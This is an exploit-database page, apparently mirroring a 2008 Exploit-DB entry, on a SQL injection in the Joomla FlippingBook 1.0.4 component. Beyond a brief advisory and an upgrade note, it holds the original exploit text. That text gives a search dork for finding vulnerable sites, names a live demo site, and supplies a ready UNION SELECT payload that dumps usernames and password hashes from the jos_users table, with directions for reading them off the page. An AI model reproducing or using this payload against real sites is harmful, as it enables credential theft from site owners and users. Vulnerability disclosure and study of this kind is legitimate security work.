header-logo
Suggest Exploit
vendor:
FlippingBook
by:
cO2 [ Algeria Security Crew ]
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: FlippingBook
Affected Version From: 1.0.4
Affected Version To: 1.0.4
Patch Exists: YES
Related CWE: N/A
CPE: a:joomla:flippingbook
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component FlippingBook 1.0.4 SQL Injection

A SQL injection vulnerability exists in Joomla Component FlippingBook 1.0.4. An attacker can exploit this vulnerability to gain access to the database and view sensitive information. The vulnerability is due to insufficient sanitization of user-supplied input to the 'book_id' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. Successful exploitation will result in the execution of arbitrary SQL commands on the underlying database.

Mitigation:

Upgrade to the latest version of Joomla Component FlippingBook.
Source

Exploit-DB raw data:

     [  A L G E R I A     S E C U R I T Y    C R E W  ]
##########################################
#
# [ Joomla Component FlippingBook 1.0.4 SQL Injection ]
#
##########################################
[~] Vulnerability found by: cO2 [ Algeria Security Crew ]
[~] Contact: c02[at]hotmail.de
[~] Website: http://www.Dz-Secure.com
[~] Greetings: to all hackers DZ . . .
##########################################
[~] ScriptName : 'Joomla'
[~] ModuleName : 'FlippingBook'
[~]  Version() :  1.0.4
###########################################
#
# DORK 1 :  inurl:com_flippingbook
#
###########################################
[+]Demo : http://www.page-flip-tools.com/index.php?option=com_flippingbook

[+]Exploit :
 
/index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
###########################################
[+] : you can see the password in 'Title'
[+] : Open the source page to see the 'password'
###########################################

# milw0rm.com [2008-04-22]

Navigation

Suggest Exploit

Services By CQR